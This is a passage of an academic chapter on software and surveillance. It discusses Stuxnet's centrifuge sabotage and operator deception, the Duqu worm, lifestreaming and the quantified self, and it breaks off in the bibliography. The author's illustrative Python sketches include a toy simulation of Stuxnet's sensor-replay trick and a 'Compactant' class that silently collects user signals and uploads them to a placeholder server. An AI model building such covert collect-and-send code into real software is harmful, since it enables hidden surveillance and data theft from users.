&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is “very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically,”… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz (Zetter 2011). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is interesting because it is not a general purpose attack, but is designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
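&lt;br /&gt;
The logic of this record-and-replay deception can be clarified with a heavily simplified Python sketch. The nominal and attack frequencies follow Zetter's description above, but the class names, the data structures and the compression of the 27-day waits into single loop steps are my own illustrative inventions, not disassembled Stuxnet code: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Illustrative simulation of a 'man-in-the-middle' control-system attack:
# record normal sensor readings, replay them to the operators' display,
# and meanwhile drive the real process through a damaging frequency sequence.
import itertools

NOMINAL_HZ = 1064            # normal drive frequency (Zetter 2011)
ATTACK_SEQUENCE = [1410, 2]  # alternating over-speed and near-stall phases

class Plant:
    def __init__(self):
        self.frequency = NOMINAL_HZ
    def sensor_reading(self):
        return self.frequency

class Worm:
    def __init__(self, plant):
        self.plant = plant
        # 'Recording' phase: capture what normal operation looks like.
        self.replay = itertools.cycle([plant.sensor_reading() for _ in range(3)])
    def attack_step(self, target_hz):
        self.plant.frequency = target_hz   # sabotage the real process
    def operator_display(self):
        return next(self.replay)           # replay recorded 'normal' data

plant = Plant()
worm = Worm(plant)
for hz in ATTACK_SEQUENCE:                 # in reality, spaced 27 days apart
    worm.attack_step(hz)
    print('actual:', plant.sensor_reading(), '| displayed:', worm.operator_display())
# The operators' screens show 1064 Hz throughout the attack.
&amp;lt;/pre&amp;gt; &lt;br /&gt;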
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it, due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source, and that they point to the kinds of procedures found in a Western government. He says: ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross 2011). Indeed, the complexities and structure of the worm suggest that at least thirty people would have been needed, working simultaneously, to build such a worm (Zetter 2010), especially one that launched a so-called ‘zero-day attack’, that is, one using a set of techniques that are neither public nor known to the developer of the attacked system, in this case Microsoft and Siemens – in actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross 2011). Because of the layered approach of its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLC (Programmable Logic Controller) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did’ (Zetter 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet were: (1) to identify its target precisely, using a number of software-based markers that gave away the physical identity of the location. Indeed, the ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60minutes 2012b); and (2) to disengage control systems from physical systems and to provide a stealth infection of the computer system that would fool the operators of the plant (the ‘man-in-the-middle attack’ described above). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller (315) was designed to slowly reduce the speed of the rotors, leading to cracks and failures, and the second, larger warhead (417) manipulated valves in the centrifuges and faked industrial process control sensor signals by modeling the centrifuges, which were grouped into 164 cascades (Langner 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010, and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges (60minutes 2012a). &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
The origin of Stuxnet has been hypothesized from an analysis of its approximately 15,000 lines of programming code. This was a close reading and reconstruction of the programming logic: taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what it was doing (Langner 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to ‘Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively’ (Markoff and Sanger 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see Table 1). &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
*Iran - 52.2% &lt;br /&gt;
*Indonesia - 17.4% &lt;br /&gt;
*India - 11.3% &lt;br /&gt;
*Pakistan - 3.6% &lt;br /&gt;
*Uzbekistan - 2.6% &lt;br /&gt;
*Russia - 2.1% &lt;br /&gt;
*Kazakhstan - 1.3% &lt;br /&gt;
*Rest of World - 9.4%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Clearly, this kind of attack could be mobilized against targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild, it is relatively trivial to decode it and so learn, in a very short time, techniques that would otherwise have taken many years of development. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60minutes 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit one whose purpose is linked to the collection of data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future (Gostev 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
The increased ability of software and code, via computational devices, to covertly monitor, control and mediate, both positively and negatively, is not just a matter of interventions designed to deceive the human and non-human actors that make up part of these assemblages. In the next section I want to look at willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems, as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have grown in recent years as ‘real-time stream’ platforms such as Twitter and Facebook have expanded. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland 2012). This has been usefully described by ''The Economist'', which argues that the, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying” (Economist 2012).&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. It closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol (Economist 2012).&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
Lifestreams were originally an idea of David Gelernter and Eric Freeman in the 1990s (Freeman 1997, Gelernter 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;A ''lifestream'' is a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries (Freeman 2000).&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
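&lt;br /&gt;
To make this document-stream model concrete, here is a minimal sketch of a time-ordered stream with an 'organise on demand' substream operator, in the spirit of Freeman's description. It is my own illustration, not the original Lifestreams system, and the documents are invented examples. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import time

class Lifestream:
    # A toy time-ordered stream of documents in the spirit of Freeman's
    # description; an illustration only, not the Lifestreams system.
    def __init__(self):
        self.docs = []                     # (timestamp, document) pairs

    def store(self, document, timestamp=None):
        # Every document is appended and kept in time order.
        ts = timestamp if timestamp is not None else time.time()
        self.docs.append((ts, document))
        self.docs.sort(key=lambda pair: pair[0])

    def substream(self, predicate):
        # 'Organise on demand': a substream is simply a filtered view.
        return [doc for ts, doc in self.docs if predicate(doc)]

stream = Lifestream()
stream.store({'kind': 'mail', 'text': 'meeting at noon'})
# A reminder sits in the future part of the stream, an hour from now.
stream.store({'kind': 'todo', 'text': 'submit draft'}, timestamp=time.time() + 3600)
print(stream.substream(lambda d: d['kind'] == 'todo'))
&amp;lt;/pre&amp;gt; &lt;br /&gt;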
Gelernter originally described these ‘chronicle streams’ (Gelernter 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also micro-streams of short updates, epitomized by Twitter's text-message-sized, 140-character posts. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks, and so forth are factored in. Stephen Wolfram was certainly one of the first people to collect his data systematically; as he explains, he started in 1989: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that. Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them (Wolfram 2012).&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and, in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt reveal much about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
This way of collecting and sending data has been accelerated by the use of mobile ‘apps’, which are small, relatively self-contained applications that usually perform a single specific function. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also to search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied (ActivityStreamsWG 2011, original emphasis). &lt;br /&gt;
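&lt;br /&gt;
The cited specification serialises such activities as JSON. The snippet below builds one actor/verb/object/target record in the spirit of JSON Activity Streams 1.0 (ActivityStreamsWG 2011); the field names follow my reading of that specification, and the values are invented examples. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import json

# One activity in the actor/verb/object/target form quoted above,
# serialised as JSON in the spirit of the Activity Streams 1.0
# specification (ActivityStreamsWG 2011); the values are invented.
activity = {
    'published': '2012-03-04T12:00:00Z',
    'actor': {'objectType': 'person', 'displayName': 'Geraldine'},
    'verb': 'post',
    'object': {'objectType': 'photo', 'id': 'photo-4711'},
    'target': {'objectType': 'photo-album', 'displayName': 'Holiday album'},
}
print(json.dumps(activity, indent=2))
&amp;lt;/pre&amp;gt; &lt;br /&gt;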
&lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case – that is, for the individual user (or lifestreamer) or for an organization (such as Facebook) – the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or a population, group, or class of others.[13] &lt;br /&gt;
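&lt;br /&gt;
As a toy illustration of this pattern matching against a norm, the sketch below compares one day's reading against a personal historical baseline using a simple standard-deviation measure; the step counts are invented. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import statistics

# Toy form of the pattern matching described above: compare today's
# reading against a personal historical norm. The numbers are invented.
history = [7200, 8100, 6900, 7600, 8000, 7400, 7900]   # daily step counts
today = 3100

mean = statistics.mean(history)
spread = statistics.stdev(history)
deviation = (today - mean) / spread
print(f'today is {deviation:.1f} standard deviations from the norm')
&amp;lt;/pre&amp;gt; &lt;br /&gt;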
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages users to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narratives, providing a stabilising web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to draw these case studies together, to think about living in code and software, and to consider the implications for the wider research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed very productive knowledge can be generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that enable the data transfers, whilst also becoming the vectors that carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time, whilst secreting themselves within our computer systems, raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data, and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs, in many ways, are life streams, albeit life streams that have not been authorized by the user whom they are monitoring. What we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to draw particular attention to this passive-aggressive feature of computational agents that collect information: they are passive in quality – under the surface, relatively benign and silent – but aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of conciseness in expression. The etymology, from the Latin for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway 2003). &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, that is, to server computers designed specifically for the task and accessed via networks. Indeed, many viruses often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
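&lt;br /&gt;
This dichotomous collect/report structure can be sketched schematically in a few lines of code. The class below is purely illustrative, not any actual web bug or virus: it has a passive phase of silent local accumulation and an aggressive phase of 'calling home', and the home URL is a placeholder. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import json
import time
import urllib.request

class Compactant:
    # Schematic of the dichotomous structure described above: a passive
    # phase of silent local collection and an aggressive phase of
    # reporting the hoard elsewhere for processing. Purely illustrative;
    # the home URL is a placeholder, not a real service.
    def __init__(self, home_url):
        self.home_url = home_url
        self.buffer = []

    def observe(self, signal):
        # Passive: quietly accumulate behavioural signals.
        self.buffer.append({'t': time.time(), 'signal': signal})

    def call_home(self):
        # Aggressive: upload the accumulated data, then start again.
        payload = json.dumps(self.buffer).encode('utf-8')
        urllib.request.urlopen(urllib.request.Request(self.home_url, data=payload))
        self.buffer = []

agent = Compactant('http://example.org/home')
agent.observe('page-view')
&amp;lt;/pre&amp;gt; &lt;br /&gt;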
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo the bad habits and behaviours of the present self. That is, there is an explicit normative orientation towards a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard – what has been described as “future self continuity” (Tugend 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series-structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
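&lt;br /&gt;
One way to see the future as a code-object is as a running forecast that is revised with every new observation. The sketch below uses simple exponential smoothing purely as an illustration of this idea; the smoothing factor and the readings are arbitrary invented values. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
class FutureProjection:
    # The future as a 'code-object': a running forecast that is updated
    # with every new real-time observation. Simple exponential smoothing
    # is used purely for illustration; the factor 0.3 is arbitrary.
    def __init__(self, alpha=0.3):
        self.alpha = alpha
        self.estimate = None

    def update(self, observation):
        if self.estimate is None:
            self.estimate = observation
        else:
            self.estimate = self.alpha * observation + (1 - self.alpha) * self.estimate
        return self.estimate

projection = FutureProjection()
for reading in [10.0, 11.5, 9.8, 12.1]:      # a stream of sensor readings
    projection.update(reading)
print('projected next value:', projection.estimate)
&amp;lt;/pre&amp;gt; &lt;br /&gt;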
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software and the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship, ref: 211106, which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: the PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; the ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; the Digital Humanities Workshop, organised by Caroline Bassett, University of Sussex; the Media Innovations Colloquium, organised by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'', organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
60minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
60minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0, Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
AP (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
CBSNews (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume 6, Number 1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The cyber-road not taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012, http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp. 67-90. &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
